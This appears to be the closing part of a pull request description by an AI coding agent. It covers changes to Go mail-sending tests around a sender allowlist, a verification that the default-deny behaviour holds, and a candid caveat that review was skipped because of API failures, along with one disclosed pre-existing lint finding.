The existing `mail_test.go` cases now wrap their sender in an explicit allow-any, with a comment saying why — they are about the send path, not the allowlist. Verified that accommodation did not weaken the default: `..._UnconfiguredDenies` still fails if it flips.

## Caveat

No code-review agent was run — many agent invocations in this session died from transient API errors, including this ticket's own implementation agent, twice. A second pair of eyes is worth having, particularly on the rescope.

One pre-existing `nilnil` lint finding in `internal/mail/script.go` is disclosed rather than fixed: it predates this branch.

Gates: `just test` green; `golangci-lint` 0 issues on both packages.

https://claude.ai/code/session_01Rz1pkAMNfQnhtQWPzvsvtg
